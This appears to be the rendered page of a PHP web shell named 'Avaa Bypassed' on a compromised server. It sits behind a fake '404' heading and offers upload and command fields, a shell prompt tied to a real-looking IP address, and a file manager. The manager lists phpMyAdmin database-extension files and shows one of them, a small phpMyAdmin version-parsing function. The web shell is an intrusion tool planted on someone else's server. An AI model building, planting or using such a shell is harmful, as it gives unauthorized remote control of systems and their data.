404

[ Avaa Bypassed ]




Upload:

Command:

botdev@3.21.34.214: ~ $
<?php
/**
 * Contract for every database extension supported by phpMyAdmin
 *
 * @package PhpMyAdmin-DBI
 */

/**
 * Defines PMA_MYSQL_CLIENT_API if it does not exist based
 * on MySQL client version.
 *
 * @param string $version MySQL version string
 *
 * @return void
 */
function PMA_defineClientAPI($version)
{
    if (!defined('PMA_MYSQL_CLIENT_API')) {
        $client_api = explode('.', $version);
        define(
            'PMA_MYSQL_CLIENT_API',
            (int)sprintf(
                '%d%02d%02d',
                $client_api[0], $client_api[1], intval($client_api[2])
            )
        );
    }
}

Filemanager

Name Type Size Permission Actions
DBIDummy.php File 38.69 KB 0644
DBIExtension.lib.php File 617 B 0644
DBIExtension.php File 6.15 KB 0644
DBIMysql.php File 13.26 KB 0644
DBIMysqli.lib.php File 745 B 0644
DBIMysqli.php File 18.42 KB 0644